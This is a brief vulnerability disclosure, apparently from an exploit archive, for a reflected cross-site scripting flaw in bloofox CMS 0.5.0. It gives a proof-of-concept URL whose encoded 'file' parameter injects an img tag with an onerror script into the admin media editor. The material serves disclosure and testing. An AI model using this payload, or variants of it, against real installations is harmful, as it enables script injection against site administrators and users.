# Affected software: bloofox cms
# Type of vulnerability:xss
# URL:bloofox.com
# Discovered by: provensec
# Website: provensec.com
#version: 0.5.0
# Proof of concept
http://demo.bloofox.com/admin/index.php?mode=content&page=media&action=edit&file=%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E&type=1%27